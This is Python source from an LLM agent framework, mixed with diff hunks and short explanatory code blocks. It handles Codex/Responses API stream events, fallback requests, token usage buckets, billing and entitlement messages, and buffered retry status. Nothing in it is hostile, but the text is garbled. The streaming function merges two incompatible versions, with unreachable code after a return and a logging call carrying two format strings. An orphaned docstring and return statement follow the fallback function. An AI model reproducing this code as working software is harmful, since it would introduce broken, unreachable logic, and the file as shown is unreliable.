if "output_text.delta" in event_type:
delta_text = _event_field(event, "delta", "")
if delta_text:
collected_text_deltas.append(delta_text)
if not has_tool_calls:
if not first_delta_fired:
first_delta_fired = True
if on_first_delta is not None:
try:
on_first_delta()
except Exception:
logger.debug("Codex stream on_first_delta raised", exc_info=True)
if on_text_delta is not None:
try:
on_text_delta(delta_text)
except Exception:
logger.debug("Codex stream on_text_delta raised", exc_info=True)
continue
if "function_call" in event_type:
has_tool_calls = True
# fall through — function_call items still get added on output_item.done
if "reasoning" in event_type and "delta" in event_type:
reasoning_text = _event_field(event, "delta", "")
if reasoning_text and on_reasoning_delta is not None:
try:
on_reasoning_delta(reasoning_text)
except Exception:
logger.debug("Codex stream on_reasoning_delta raised", exc_info=True)
continue
if event_type == "response.output_item.done":
done_item = _event_field(event, "item")
if done_item is not None:
collected_output_items.append(done_item)
continue
if event_type in _TERMINAL_EVENT_TYPES:
saw_terminal = True
resp_obj = _event_field(event, "response")
if resp_obj is not None:
terminal_usage = getattr(resp_obj, "usage", None)
if terminal_usage is None and isinstance(resp_obj, dict):
terminal_usage = resp_obj.get("usage")
rid = getattr(resp_obj, "id", None)
if rid is None and isinstance(resp_obj, dict):
rid = resp_obj.get("id")
terminal_response_id = rid
rstatus = getattr(resp_obj, "status", None)
if rstatus is None and isinstance(resp_obj, dict):
rstatus = resp_obj.get("status")
if isinstance(rstatus, str):
terminal_status = rstatus
if event_type == "response.incomplete":
terminal_incomplete_details = getattr(resp_obj, "incomplete_details", None)
if terminal_incomplete_details is None and isinstance(resp_obj, dict):
terminal_incomplete_details = resp_obj.get("incomplete_details")
if event_type == "response.failed":
terminal_error = getattr(resp_obj, "error", None)
if terminal_error is None and isinstance(resp_obj, dict):
terminal_error = resp_obj.get("error")
# ``terminal_status`` defaults to "completed", so an ``or`` fallback would
# never apply. When the payload carried no usable status, derive it from
# the event type instead.
if event_type == "response.incomplete" and terminal_status == "completed":
terminal_status = "incomplete"
elif event_type == "response.failed" and terminal_status == "completed":
terminal_status = "failed"
# Stop on terminal event.
break
# Build the final output list. Prefer items observed via output_item.done;
# if none arrived but we streamed plain text deltas (no tool calls), synthesize
# a single message item so downstream normalization has something to work with.
if collected_output_items:
output = list(collected_output_items)
elif collected_text_deltas and not has_tool_calls:
assembled = "".join(collected_text_deltas)
output = [SimpleNamespace(
type="message",
role="assistant",
status="completed",
content=[SimpleNamespace(type="output_text", text=assembled)],
)]
else:
output = []
# If the stream ended without any terminal event AND produced no usable
# content (no items, no text deltas), surface that as a RuntimeError so
# callers can distinguish "stream truncated mid-flight / provider rejected
# the call" from "stream completed with empty body". This preserves the
# signal the SDK's high-level helper used to raise as
# ``RuntimeError("Didn't receive a `response.completed` event.")``.
if not saw_terminal and not output:
raise RuntimeError(
"Codex Responses stream did not emit a terminal response"
)
assembled_text = "".join(collected_text_deltas)
final = SimpleNamespace(
output=output,
output_text=assembled_text,
usage=terminal_usage,
status=terminal_status,
id=terminal_response_id,
model=model,
incomplete_details=terminal_incomplete_details,
error=terminal_error,
)
return final
def run_codex_stream(agent, api_kwargs: dict, client: Any = None, on_first_delta=None):
"""Execute one streaming Responses API request and return the final response.
Uses ``responses.create(stream=True)`` (low-level raw event iteration)
rather than the high-level ``responses.stream(...)`` helper. This makes
us structurally immune to backend drift in the ``response.completed``
payload shape: we never let the SDK reconstruct a typed object from
the terminal event's ``output`` field.
"""
import httpx as _httpx
active_client = client or agent._ensure_primary_openai_client(reason="codex_stream_direct")
max_stream_retries = 1
has_tool_calls = False
first_delta_fired = False
# Accumulate streamed text so we can recover if get_final_response()
# returns empty output (e.g. chatgpt.com backend-api sends
# response.incomplete instead of response.completed).
# Accumulate streamed text so callers / compat shims can read it.
agent._codex_streamed_text_parts: list = []
def _on_text_delta(text: str) -> None:
agent._codex_streamed_text_parts.append(text)
agent._fire_stream_delta(text)
def _on_reasoning_delta(text: str) -> None:
agent._fire_reasoning_delta(text)
def _on_event(event: Any) -> None:
# TTFB watchdog and activity touch — runs once per SSE event.
agent._codex_stream_last_event_ts = time.time()
agent._touch_activity("receiving stream response")
def _interrupt_check() -> bool:
return bool(agent._interrupt_requested)
for attempt in range(max_stream_retries + 1):
if agent._interrupt_requested:
raise InterruptedError("Agent interrupted before Codex stream retry")
collected_output_items: list = []
stream_kwargs = dict(api_kwargs)
stream_kwargs["stream"] = True
try:
with active_client.responses.stream(**api_kwargs) as stream:
for event in stream:
# Mark stream activity for the TTFB watchdog in
# interruptible_api_call. The Codex backend can accept the
# connection but never emit a single event; this timestamp
# staying None tells the watchdog no bytes are flowing.
agent._codex_stream_last_event_ts = time.time()
agent._touch_activity("receiving stream response")
if agent._interrupt_requested:
break
event_type = getattr(event, "type", "")
# Fire callbacks on text content deltas (suppress during tool calls)
if "output_text.delta" in event_type or event_type == "response.output_text.delta":
delta_text = getattr(event, "delta", "")
if delta_text:
agent._codex_streamed_text_parts.append(delta_text)
if delta_text and not has_tool_calls:
if not first_delta_fired:
first_delta_fired = True
if on_first_delta:
try:
on_first_delta()
except Exception:
pass
agent._fire_stream_delta(delta_text)
# Track tool calls to suppress text streaming
elif "function_call" in event_type:
has_tool_calls = True
# Fire reasoning callbacks
elif "reasoning" in event_type and "delta" in event_type:
reasoning_text = getattr(event, "delta", "")
if reasoning_text:
agent._fire_reasoning_delta(reasoning_text)
# Collect completed output items — some backends
# (chatgpt.com/backend-api/codex) stream valid items
# via response.output_item.done but the SDK's
# get_final_response() returns an empty output list.
elif event_type == "response.output_item.done":
done_item = getattr(event, "item", None)
if done_item is not None:
collected_output_items.append(done_item)
# Log non-completed terminal events for diagnostics
elif event_type in {"response.incomplete", "response.failed"}:
resp_obj = getattr(event, "response", None)
status = getattr(resp_obj, "status", None) if resp_obj else None
incomplete_details = getattr(resp_obj, "incomplete_details", None) if resp_obj else None
logger.warning(
"Codex Responses stream received terminal event %s "
"(status=%s, incomplete_details=%s, streamed_chars=%d). %s",
event_type, status, incomplete_details,
sum(len(p) for p in agent._codex_streamed_text_parts),
agent._client_log_context(),
)
final_response = stream.get_final_response()
# PATCH: ChatGPT Codex backend streams valid output items
# but get_final_response() can return an empty output list.
# Backfill from collected items or synthesize from deltas.
_out = getattr(final_response, "output", None)
if isinstance(_out, list) and not _out:
if collected_output_items:
final_response.output = list(collected_output_items)
logger.debug(
"Codex stream: backfilled %d output items from stream events",
len(collected_output_items),
)
elif agent._codex_streamed_text_parts and not has_tool_calls:
assembled = "".join(agent._codex_streamed_text_parts)
final_response.output = [SimpleNamespace(
type="message",
role="assistant",
status="completed",
content=[SimpleNamespace(type="output_text", text=assembled)],
)]
logger.debug(
"Codex stream: synthesized output from %d text deltas (%d chars)",
len(agent._codex_streamed_text_parts), len(assembled),
)
return final_response
event_stream = active_client.responses.create(**stream_kwargs)
except (_httpx.RemoteProtocolError, _httpx.ReadTimeout, _httpx.ConnectError, ConnectionError) as exc:
if attempt < max_stream_retries:
logger.debug(
"Codex Responses stream transport failed (attempt %s/%s); retrying. %s error=%s",
attempt + 1,
max_stream_retries + 1,
agent._client_log_context(),
exc,
"Codex Responses stream connect failed (attempt %s/%s); retrying. %s error=%s",
attempt + 1, max_stream_retries + 1,
agent._client_log_context(), exc,
)
continue
logger.debug(
"Codex Responses stream transport failed; falling back to create(stream=True). %s error=%s",
agent._client_log_context(),
exc,
)
return agent._run_codex_create_stream_fallback(api_kwargs, client=active_client)
except RuntimeError as exc:
err_text = str(exc)
missing_completed = "response.completed" in err_text
# The OpenAI SDK's Responses streaming state machine raises
# ``RuntimeError("Expected to have received `response.created`
# before `<event-type>`")`` when the first SSE event from the
# server is anything other than ``response.created`` — and it
# discards the event's payload before we can read it. Three
# real-world backends emit a different first frame:
#
# * xAI on grok-4.x OAuth — sends ``error`` (issues
# reported around the May 2026 SuperGrok rollout when
# multi-turn conversations replay encrypted reasoning
# content the OAuth tier rejects)
# * codex-lb relays — send ``codex.rate_limits`` (#14634)
# * custom Responses relays — send ``response.in_progress``
# (#8133)
#
# In all three cases the underlying byte stream is still
# readable: a raw ``responses.create(stream=True)``
# fallback succeeds and surfaces the real provider error as
# a normal exception with body+status_code attached, which
# ``_summarize_api_error`` can then translate into a useful
# user-facing line. Treat ``response.created`` prelude
# errors the same way we already treat ``response.completed``
# postlude errors.
prelude_error = (
"Expected to have received `response.created`" in err_text
or "Expected to have received \"response.created\"" in err_text
)
if (missing_completed or prelude_error) and attempt < max_stream_retries:
logger.debug(
"Responses stream %s (attempt %s/%s); retrying. %s",
"prelude rejected" if prelude_error else "closed before completion",
attempt + 1,
max_stream_retries + 1,
agent._client_log_context(),
)
continue
if missing_completed or prelude_error:
logger.debug(
"Responses stream %s; falling back to create(stream=True). %s err=%s",
"rejected before response.created" if prelude_error else "did not emit response.completed",
agent._client_log_context(),
err_text,
)
return agent._run_codex_create_stream_fallback(api_kwargs, client=active_client)
raise
try:
# Compatibility: some mocks/providers return a concrete response
# instead of an iterable. Pass it straight through.
if hasattr(event_stream, "output") and not hasattr(event_stream, "__iter__"):
return event_stream
try:
final = _consume_codex_event_stream(
event_stream,
model=api_kwargs.get("model"),
on_text_delta=_on_text_delta,
on_reasoning_delta=_on_reasoning_delta,
on_first_delta=on_first_delta,
on_event=_on_event,
interrupt_check=_interrupt_check,
)
except (_httpx.RemoteProtocolError, _httpx.ReadTimeout, _httpx.ConnectError, ConnectionError) as exc:
if attempt < max_stream_retries:
logger.debug(
"Codex Responses stream transport failed mid-iteration "
"(attempt %s/%s); retrying. %s error=%s",
attempt + 1, max_stream_retries + 1,
agent._client_log_context(), exc,
)
continue
raise
if final.status in {"incomplete", "failed"}:
logger.warning(
"Codex Responses stream terminal status=%s "
"(incomplete_details=%s, error=%s, streamed_chars=%d). %s",
final.status, final.incomplete_details, final.error,
sum(len(p) for p in agent._codex_streamed_text_parts),
agent._client_log_context(),
)
return final
finally:
close_fn = getattr(event_stream, "close", None)
if callable(close_fn):
try:
close_fn()
except Exception:
pass
def run_codex_create_stream_fallback(agent, api_kwargs: dict, client: Any = None):
"""Fallback path for stream completion edge cases on Codex-style Responses backends."""
active_client = client or agent._ensure_primary_openai_client(reason="codex_create_stream_fallback")
fallback_kwargs = dict(api_kwargs)
fallback_kwargs["stream"] = True
fallback_kwargs = agent._get_transport().preflight_kwargs(fallback_kwargs, allow_stream=True)
stream_or_response = active_client.responses.create(**fallback_kwargs)
# Compatibility shim for mocks or providers that still return a concrete response.
if hasattr(stream_or_response, "output"):
return stream_or_response
if not hasattr(stream_or_response, "__iter__"):
return stream_or_response
terminal_response = None
collected_output_items: list = []
collected_text_deltas: list = []
try:
for event in stream_or_response:
agent._touch_activity("receiving stream response")
event_type = getattr(event, "type", None)
if not event_type and isinstance(event, dict):
event_type = event.get("type")
# ``error`` SSE frames carry the provider's real failure
# reason (subscription / quota / model-not-available /
# rejected-reasoning-replay) but never appear in the
# ``{completed, incomplete, failed}`` terminal set, so the
# raw loop below would silently consume them and end with
# "did not emit a terminal response". xAI in particular
# emits ``type=error`` as the FIRST frame for OAuth
# accounts whose Grok subscription is missing/exhausted —
# the SDK's stream helper raises ``RuntimeError(Expected
# to have received response.created before error)`` which
# the caller catches and routes here, expecting this
# fallback to surface the message. Synthesize an
# APIError-shaped exception so ``_summarize_api_error``
# and the credential-pool entitlement detector see the
# real text instead of a generic RuntimeError.
if event_type == "error":
err_message = getattr(event, "message", None)
if not err_message and isinstance(event, dict):
err_message = event.get("message")
err_code = getattr(event, "code", None)
if not err_code and isinstance(event, dict):
err_code = event.get("code")
err_param = getattr(event, "param", None)
if not err_param and isinstance(event, dict):
err_param = event.get("param")
err_message = (err_message or "stream emitted error event").strip()
from run_agent import _StreamErrorEvent
raise _StreamErrorEvent(err_message, code=err_code, param=err_param)
# Collect output items and text deltas for backfill
if event_type == "response.output_item.done":
done_item = getattr(event, "item", None)
if done_item is None and isinstance(event, dict):
done_item = event.get("item")
if done_item is not None:
collected_output_items.append(done_item)
elif event_type in {"response.output_text.delta",}:
delta = getattr(event, "delta", "")
if not delta and isinstance(event, dict):
delta = event.get("delta", "")
if delta:
collected_text_deltas.append(delta)
if event_type not in {"response.completed", "response.incomplete", "response.failed"}:
continue
terminal_response = getattr(event, "response", None)
if terminal_response is None and isinstance(event, dict):
terminal_response = event.get("response")
if terminal_response is not None:
# Backfill empty output from collected stream events
_out = getattr(terminal_response, "output", None)
if isinstance(_out, list) and not _out:
if collected_output_items:
terminal_response.output = list(collected_output_items)
logger.debug(
"Codex fallback stream: backfilled %d output items",
len(collected_output_items),
)
elif collected_text_deltas:
assembled = "".join(collected_text_deltas)
terminal_response.output = [SimpleNamespace(
type="message", role="assistant",
status="completed",
content=[SimpleNamespace(type="output_text", text=assembled)],
)]
logger.debug(
"Codex fallback stream: synthesized from %d deltas (%d chars)",
len(collected_text_deltas), len(assembled),
)
return terminal_response
finally:
close_fn = getattr(stream_or_response, "close", None)
if callable(close_fn):
try:
close_fn()
except Exception:
pass
if terminal_response is not None:
return terminal_response
raise RuntimeError("Responses create(stream=True) fallback did not emit a terminal response.")
"""Backward-compatible alias for the unified event-driven path.
Historically this was the fallback when the SDK's high-level
``responses.stream(...)`` helper raised on shape drift. The primary
path now does exactly what the fallback did, so this just forwards.
Kept as a public symbol because tests and a small number of call sites
still reference it by name.
"""
return run_codex_stream(agent, api_kwargs, client=client)
__all__ = [
"run_codex_app_server_turn",
"run_codex_stream",
"run_codex_create_stream_fallback",
"_consume_codex_event_stream",
]
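The event-driven assembly described in this file can be reduced to a small self-contained sketch. It is not the project's `_consume_codex_event_stream`: the function name `assemble_response` is hypothetical, events are plain dicts rather than SDK objects, and callbacks, tool-call suppression and error frames are left out. It only shows the core idea, which is that the final output is built from `response.output_item.done` events and text deltas, never from the terminal event's `output` field.

```python
from types import SimpleNamespace
from typing import Any, Dict, Iterable, List

TERMINAL_EVENT_TYPES = frozenset(
    {"response.completed", "response.incomplete", "response.failed"}
)


def assemble_response(events: Iterable[Dict[str, Any]]) -> SimpleNamespace:
    """Build a response-like object from raw stream events (sketch)."""
    items: List[Any] = []
    deltas: List[str] = []
    usage = None
    saw_terminal = False
    for event in events:
        event_type = event.get("type", "")
        if event_type == "response.output_text.delta":
            deltas.append(event.get("delta", ""))
        elif event_type == "response.output_item.done":
            if event.get("item") is not None:
                items.append(event["item"])
        elif event_type in TERMINAL_EVENT_TYPES:
            saw_terminal = True
            # Only metadata is read here; "output" is deliberately ignored.
            usage = (event.get("response") or {}).get("usage")
            break
    text = "".join(deltas)
    if not items and text:
        # No item arrived: synthesize one message item from the deltas.
        items = [{
            "type": "message",
            "role": "assistant",
            "content": [{"type": "output_text", "text": text}],
        }]
    if not saw_terminal and not items:
        raise RuntimeError("stream ended without a terminal event or content")
    return SimpleNamespace(output=items, output_text=text, usage=usage)


events = [
    {"type": "response.created"},
    {"type": "response.output_text.delta", "delta": "Hel"},
    {"type": "response.output_text.delta", "delta": "lo"},
    {"type": "response.completed",
     "response": {"output": None, "usage": {"total_tokens": 7}}},
]
final = assemble_response(events)
```

The terminal frame in the example carries `output: None`, the shape that broke the high-level helper, and the assembled result is unaffected by it.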
+6 -1
@@ -71,7 +71,12 @@ class ContextEngine(ABC):
def update_from_response(self, usage: Dict[str, Any]) -> None:
"""Update tracked token usage from an API response.
Called after every LLM call with the usage dict from the response.
Called after every LLM call with a normalized usage dict. The legacy
keys ``prompt_tokens``, ``completion_tokens``, and ``total_tokens``
are always present. Newer hosts also include canonical buckets:
``input_tokens``, ``output_tokens``, ``cache_read_tokens``,
``cache_write_tokens``, and ``reasoning_tokens``. Engines should
treat those fields as optional for compatibility with older hosts.
"""
@abstractmethod
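An engine written against the updated docstring might read the usage dict along these lines. This is a sketch under assumptions: the helper name `read_usage` is hypothetical, and falling back from `input_tokens` / `output_tokens` to the legacy keys is a choice made for the example, not something the diff specifies.

```python
from typing import Any, Dict


def read_usage(usage: Dict[str, Any]) -> Dict[str, int]:
    """Read a normalized usage dict, treating canonical buckets as optional."""
    # Legacy keys are documented as always present.
    prompt = int(usage["prompt_tokens"])
    completion = int(usage["completion_tokens"])
    return {
        # Assumption for this sketch: fall back to the legacy counts when
        # an older host omits the canonical buckets.
        "input": int(usage.get("input_tokens", prompt)),
        "output": int(usage.get("output_tokens", completion)),
        "cache_read": int(usage.get("cache_read_tokens", 0)),
        "cache_write": int(usage.get("cache_write_tokens", 0)),
        "reasoning": int(usage.get("reasoning_tokens", 0)),
        "total": int(usage["total_tokens"]),
    }


legacy = read_usage(
    {"prompt_tokens": 10, "completion_tokens": 5, "total_tokens": 15}
)
```

Using `.get()` for the newer keys keeps the engine working on hosts that only send the three legacy fields.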
+1
@@ -421,6 +421,7 @@ def compress_context(
agent.session_id or "",
boundary_reason="compression",
old_session_id=_old_sid,
conversation_id=getattr(agent, "_gateway_session_key", None),
)
except Exception as _ce_err:
logger.debug("context engine on_session_start (compression): %s", _ce_err)
+417 -117
@@ -49,9 +49,8 @@ from agent.model_metadata import (
MINIMUM_CONTEXT_LENGTH,
estimate_messages_tokens_rough,
estimate_request_tokens_rough,
get_next_probe_tier,
get_context_length_from_provider_error,
parse_available_output_tokens_from_error,
parse_context_limit_from_error,
save_context_length,
)
from agent.nous_rate_guard import (
@@ -127,6 +126,106 @@ def _ra():
return run_agent
def _nous_entitlement_message(capability: str) -> str:
try:
from hermes_cli.nous_account import (
format_nous_portal_entitlement_message,
get_nous_portal_account_info,
)
account_info = get_nous_portal_account_info(force_fresh=True)
message = format_nous_portal_entitlement_message(
account_info,
capability=capability,
)
return message or ""
except Exception:
return ""
def _print_nous_entitlement_guidance(agent, capability: str) -> bool:
message = _nous_entitlement_message(capability)
if not message:
return False
for line in message.splitlines():
agent._vprint(f"{agent.log_prefix} 💡 {line}", force=True)
return True
def _is_nous_inference_route(provider: str, base_url: str) -> bool:
provider = (provider or "").strip().lower()
if provider == "nous":
return True
base = str(base_url or "")
return (
base_url_host_matches(base, "inference-api.nousresearch.com")
or base_url_host_matches(base, "inference.nousresearch.com")
)
def _billing_or_entitlement_message(
*,
capability: str,
provider: str,
base_url: str,
model: str,
) -> str:
if _is_nous_inference_route(provider, base_url):
return _nous_entitlement_message(capability)
provider_label = (provider or "").strip() or "the selected provider"
model_label = (model or "").strip() or "the selected model"
lines = [
(
f"{provider_label} reported that billing, credits, or account "
f"entitlement is exhausted for {model_label}."
),
"Add credits or update billing with that provider, then retry.",
]
if base_url_host_matches(str(base_url or ""), "openrouter.ai"):
lines.append("OpenRouter credits: https://openrouter.ai/settings/credits")
lines.append("You can switch providers temporarily with /model <model> --provider <provider>.")
return "\n".join(lines)
def _print_billing_or_entitlement_guidance(
agent,
*,
capability: str,
provider: str,
base_url: str,
model: str,
) -> bool:
message = _billing_or_entitlement_message(
capability=capability,
provider=provider,
base_url=base_url,
model=model,
)
if not message:
return False
for line in message.splitlines():
agent._vprint(f"{agent.log_prefix} 💡 {line}", force=True)
return True
def _try_refresh_nous_paid_entitlement_credentials(agent) -> bool:
"""Refresh Nous runtime credentials after a fresh paid-entitlement check."""
try:
from hermes_cli.auth import NOUS_INFERENCE_AUTH_MODE_LEGACY
from hermes_cli.nous_account import get_nous_portal_account_info
account_info = get_nous_portal_account_info(force_fresh=True)
if account_info.paid_service_access is not True:
return False
return agent._try_refresh_nous_client_credentials(
force=False,
inference_auth_mode=NOUS_INFERENCE_AUTH_MODE_LEGACY,
)
except Exception:
return False
def _restore_or_build_system_prompt(agent, system_message, conversation_history):
"""Restore the cached system prompt from the session DB or build it fresh.
@@ -1017,8 +1116,10 @@ def run_conversation(
codex_auth_retry_attempted=False
anthropic_auth_retry_attempted=False
nous_auth_retry_attempted=False
nous_paid_entitlement_refresh_attempted=False
copilot_auth_retry_attempted=False
thinking_sig_retry_attempted = False
invalid_encrypted_content_retry_attempted = False
image_shrink_retry_attempted = False
multimodal_tool_content_retry_attempted = False
oauth_1m_beta_retry_attempted = False
@@ -1049,17 +1150,18 @@ def run_conversation(
f"Nous Portal rate limit active — "
f"resets in {_fmt_nous_remaining(_nous_remaining)}."
)
agent._vprint(
f"{agent.log_prefix}{_nous_msg} Trying fallback...",
force=True,
agent._buffer_vprint(
f"{_nous_msg} Trying fallback..."
)
agent._emit_status(f"{_nous_msg}")
agent._buffer_status(f"{_nous_msg}")
if agent._try_activate_fallback():
retry_count = 0
compression_attempts = 0
primary_recovery_attempted = False
continue
# No fallback available — return with clear message
# No fallback available — surface buffered context
# so user sees the rate-limit message that led here.
agent._flush_status_buffer()
agent._persist_session(messages, conversation_history)
return {
"final_response": (
@@ -1081,6 +1183,14 @@ def run_conversation(
try:
agent._reset_stream_delivery_tracking()
# api_messages is built once, before this retry loop, while the
# primary provider is active. A mid-conversation fallback can
# switch to a require-side provider (DeepSeek / Kimi / MiMo) that
# rejects assistant turns lacking reasoning_content. Re-apply the
# echo-back pad for the *current* provider here (idempotent no-op
# unless the active provider needs it) so the fallback request
# isn't sent with stale, primary-shaped reasoning fields.
agent._reapply_reasoning_echo_for_provider(api_messages)
api_kwargs = agent._build_api_kwargs(api_messages)
if agent._force_ascii_payload:
_sanitize_structure_non_ascii(api_kwargs)
@@ -1274,9 +1384,10 @@ def run_conversation(
error_details.append("response.choices is empty")
if response_invalid:
# Stop spinner before printing error messages
# Stop spinner silently — retry status is now buffered
# and only surfaced if every retry+fallback exhausts.
if thinking_spinner:
thinking_spinner.stop("(´;ω;`) oops, retrying...")
thinking_spinner.stop("")
thinking_spinner = None
if agent.thinking_callback:
agent.thinking_callback("")
@@ -1289,7 +1400,7 @@ def run_conversation(
# rate-limit symptom. Switch to fallback immediately
# rather than retrying with extended backoff.
if agent._fallback_index < len(agent._fallback_chain):
agent._emit_status("⚠️ Empty/malformed response — switching to fallback...")
agent._buffer_status("⚠️ Empty/malformed response — switching to fallback...")
if agent._try_activate_fallback():
retry_count = 0
compression_attempts = 0
@@ -1351,20 +1462,22 @@ def run_conversation(
else:
_failure_hint = f"response time {api_duration:.1f}s"
agent._vprint(f"{agent.log_prefix}⚠️ Invalid API response (attempt {retry_count}/{max_retries}): {', '.join(error_details)}", force=True)
agent._vprint(f"{agent.log_prefix} 🏢 Provider: {provider_name}", force=True)
agent._buffer_vprint(f"⚠️ Invalid API response (attempt {retry_count}/{max_retries}): {', '.join(error_details)}")
agent._buffer_vprint(f" 🏢 Provider: {provider_name}")
cleaned_provider_error = agent._clean_error_message(error_msg)
agent._vprint(f"{agent.log_prefix} 📝 Provider message: {cleaned_provider_error}", force=True)
agent._vprint(f"{agent.log_prefix} ⏱️ {_failure_hint}", force=True)
agent._buffer_vprint(f" 📝 Provider message: {cleaned_provider_error}")
agent._buffer_vprint(f" ⏱️ {_failure_hint}")
if retry_count >= max_retries:
# Try fallback before giving up
agent._emit_status(f"⚠️ Max retries ({max_retries}) for invalid responses — trying fallback...")
agent._buffer_status(f"⚠️ Max retries ({max_retries}) for invalid responses — trying fallback...")
if agent._try_activate_fallback():
retry_count = 0
compression_attempts = 0
primary_recovery_attempted = False
continue
# Terminal — flush buffered retry trace so user sees what happened.
agent._flush_status_buffer()
agent._emit_status(f"❌ Max retries ({max_retries}) exceeded for invalid responses. Giving up.")
logger.error(f"{agent.log_prefix}Invalid API response after {max_retries} retries.")
agent._persist_session(messages, conversation_history)
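Reviewer sketch (not part of the diff): the hunks above queue retry chatter and only surface it on a terminal failure. A minimal illustration of that pattern follows. The class `StatusBuffer` and its method names are hypothetical; the real `_buffer_status`, `_buffer_vprint`, and `_flush_status_buffer` are not shown in this comparison and may behave differently.

```python
class StatusBuffer:
    """Hypothetical sketch: hold retry messages until the outcome is known."""

    def __init__(self, emit):
        self._emit = emit      # callable that shows one line to the user
        self._pending = []     # messages queued since the last flush/clear

    def buffer(self, message):
        """Queue a message instead of showing it right away."""
        self._pending.append(message)

    def flush(self):
        """Terminal failure: show everything queued, in order, then reset."""
        for message in self._pending:
            self._emit(message)
        self._pending.clear()

    def clear(self):
        """Successful recovery: drop the queued trace without showing it."""
        self._pending.clear()
```

With this shape, a user who recovers through a fallback sees nothing, while a user who hits the terminal branch sees the full retry trace before the final error line.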
@@ -1378,7 +1491,7 @@ def run_conversation(
# Backoff before retry — jittered exponential: 5s base, 120s cap
wait_time = jittered_backoff(retry_count, base_delay=5.0, max_delay=120.0)
agent._vprint(f"{agent.log_prefix}⏳ Retrying in {wait_time:.1f}s ({_failure_hint})...", force=True)
agent._buffer_vprint(f"⏳ Retrying in {wait_time:.1f}s ({_failure_hint})...")
logger.warning(f"Invalid API response (retry {retry_count}/{max_retries}): {', '.join(error_details)} | Provider: {provider_name}")
# Sleep in small increments to stay responsive to interrupts
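Reviewer sketch (not part of the diff): the comments above describe a jittered exponential backoff (5s base, 120s cap) followed by a sleep taken in small increments. The code below is one way that could look. It is not the project's `jittered_backoff`; the names `backoff_delay` and `interruptible_sleep`, the full-jitter formula, and the 0.2s step are all assumptions made for illustration.

```python
import random
import time


def backoff_delay(attempt, base_delay=5.0, max_delay=120.0, rng=random):
    """Return a jittered exponential delay for a 1-based attempt number.

    Hypothetical helper: exponential growth capped at max_delay, then
    full jitter (a uniform draw between 0 and the capped value).
    """
    capped = min(max_delay, base_delay * (2 ** max(0, attempt - 1)))
    return rng.uniform(0.0, capped)


def interruptible_sleep(seconds, should_stop, step=0.2, sleep=time.sleep):
    """Sleep in small steps; return False early if should_stop() is true."""
    remaining = seconds
    while remaining > 0:
        if should_stop():
            return False
        chunk = min(step, remaining)
        sleep(chunk)
        remaining -= chunk
    return True
```

Sleeping in short chunks bounds the time between an interrupt request and the loop noticing it to roughly one step, at the cost of a few extra wake-ups.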
@@ -1605,14 +1718,14 @@ def run_conversation(
if assistant_message is not None and _trunc_has_tool_calls:
if truncated_tool_call_retries < 1:
truncated_tool_call_retries += 1
agent._vprint(
f"{agent.log_prefix}⚠️ Truncated tool call detected — retrying API call...",
force=True,
agent._buffer_vprint(
f"⚠️ Truncated tool call detected — retrying API call..."
)
# Don't append the broken response to messages;
# just re-run the same API call from the current
# message state, giving the model another chance.
continue
agent._flush_status_buffer()
agent._vprint(
f"{agent.log_prefix}⚠️ Truncated tool call response detected again — refusing to execute incomplete tool arguments.",
force=True,
@@ -1646,6 +1759,7 @@ def run_conversation(
}
else:
# First message was truncated - mark as failed
agent._flush_status_buffer()
agent._vprint(f"{agent.log_prefix}❌ First response truncated - cannot recover", force=True)
agent._persist_session(messages, conversation_history)
return {
@@ -1667,10 +1781,19 @@ def run_conversation(
prompt_tokens = canonical_usage.prompt_tokens
completion_tokens = canonical_usage.output_tokens
total_tokens = canonical_usage.total_tokens
# Forward canonical token + cache buckets so context engines
# can make decisions on cache hit ratios / reasoning costs,
# not just legacy aggregate tokens. Legacy keys stay for
# back-compat with engines that only read prompt/completion/total.
usage_dict = {
"prompt_tokens": prompt_tokens,
"completion_tokens": completion_tokens,
"total_tokens": total_tokens,
"input_tokens": canonical_usage.input_tokens,
"output_tokens": canonical_usage.output_tokens,
"cache_read_tokens": canonical_usage.cache_read_tokens,
"cache_write_tokens": canonical_usage.cache_write_tokens,
"reasoning_tokens": canonical_usage.reasoning_tokens,
}
agent.context_compressor.update_from_response(usage_dict)
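Reviewer sketch (not part of the diff): the comment above says the extra buckets let a context engine reason about cache hit ratios. A consumer of `usage_dict` might compute one as below. The helper `cache_hit_ratio` is hypothetical, and it assumes `input_tokens` excludes cached tokens, which this diff does not state.

```python
def cache_hit_ratio(usage):
    """Fraction of prompt-side tokens served from cache (hypothetical helper).

    Assumes input_tokens counts only uncached input; missing or None
    buckets are treated as zero so legacy usage dicts still work.
    """
    read = usage.get("cache_read_tokens") or 0
    fresh = usage.get("input_tokens") or 0
    write = usage.get("cache_write_tokens") or 0
    total = read + fresh + write
    return read / total if total else 0.0
```

An engine that only reads the legacy `prompt_tokens` / `completion_tokens` / `total_tokens` keys is unaffected, since those keys are still present in the dict.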
@@ -1788,6 +1911,11 @@ def run_conversation(
)
has_retried_429 = False # Reset on success
# Note: don't clear the retry buffer here — an "API call
# success" only means we got bytes back, not that we got
# usable content. Empty responses still loop through the
# empty-retry path below; the buffer is cleared when
# genuinely successful content is detected later (~L4127).
# Clear Nous rate limit state on successful request —
# proves the limit has reset and other sessions can
# resume hitting Nous.
@@ -1814,9 +1942,10 @@ def run_conversation(
break
except Exception as api_error:
# Stop spinner before printing error messages
# Stop spinner silently — retry status is buffered and
# only flushed when every retry+fallback is exhausted.
if thinking_spinner:
thinking_spinner.stop("(╥_╥) error, retrying...")
thinking_spinner.stop("")
thinking_spinner = None
if agent.thinking_callback:
agent.thinking_callback("")
@@ -1871,14 +2000,12 @@ def run_conversation(
if _surrogates_found or _is_surrogate_error:
agent._unicode_sanitization_passes += 1
if _surrogates_found:
agent._vprint(
f"{agent.log_prefix}⚠️ Stripped invalid surrogate characters from messages. Retrying...",
force=True,
agent._buffer_vprint(
f"⚠️ Stripped invalid surrogate characters from messages. Retrying..."
)
else:
agent._vprint(
f"{agent.log_prefix}⚠️ Surrogate encoding error — retrying after full-payload sanitization...",
force=True,
agent._buffer_vprint(
f"⚠️ Surrogate encoding error — retrying after full-payload sanitization..."
)
continue
if _is_ascii_codec:
@@ -2092,6 +2219,23 @@ def run_conversation(
classified.should_rotate_credential, classified.should_fallback,
)
if (
classified.reason == FailoverReason.billing
and _is_nous_inference_route(
getattr(agent, "provider", "") or "",
getattr(agent, "base_url", "") or "",
)
and not nous_paid_entitlement_refresh_attempted
):
nous_paid_entitlement_refresh_attempted = True
if _try_refresh_nous_paid_entitlement_credentials(agent):
agent._vprint(
f"{agent.log_prefix}🔐 Nous paid access verified — "
"refreshed runtime credentials and retrying request...",
force=True,
)
continue
recovered_with_pool, has_retried_429 = agent._recover_with_credential_pool(
status_code=status_code,
has_retried_429=has_retried_429,
